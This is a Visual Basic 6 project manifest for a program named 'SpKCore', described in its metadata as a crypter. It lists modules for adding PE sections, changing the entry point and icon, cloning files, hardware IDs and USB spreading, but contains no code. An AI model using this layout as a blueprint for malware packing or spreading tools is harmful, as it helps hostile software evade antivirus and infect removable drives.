Type=Exe
Module=oqexwtcbm; oqexwtcbm.bas
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\Windows\SysWOW64\stdole2.tlb#OLE Automation
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; comdlg32.ocx
Class=Class1; Class1.cls
Module=mAddSection; mAddSection.bas
Module=mRealign; mRealign.bas
Module=mIconChange; mod_icon.bas
Module=ChangeOEP; ChangeEP.bas
Module=mUSBspread; mUSBspread.bas
Module=Module1; Module1b.bas
Module=mCloneFile; mCloneFile.bas
Object={BD0C1912-66C3-49CC-8B12-7B347BF6C846}#13.2#0; CO2628~1.OCX
Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
Form=frmLogin(1).frm
Form=frmSplash.frm
Module=mHardwareID; mHardwareID.bas
Form=frmAbout.frm
IconForm="frmMain"
Startup="frmLogin"
HelpFile=""
Title="SpKCore"
ExeName32="SpKCORE.exe"
Path32="..\SpKCore Release Beta"
Command32=""
Name="SpKCORE"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="SpKCore Solutions"
VersionFileDescription="SpKCore Crypter"
VersionProductName="SpKCore"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
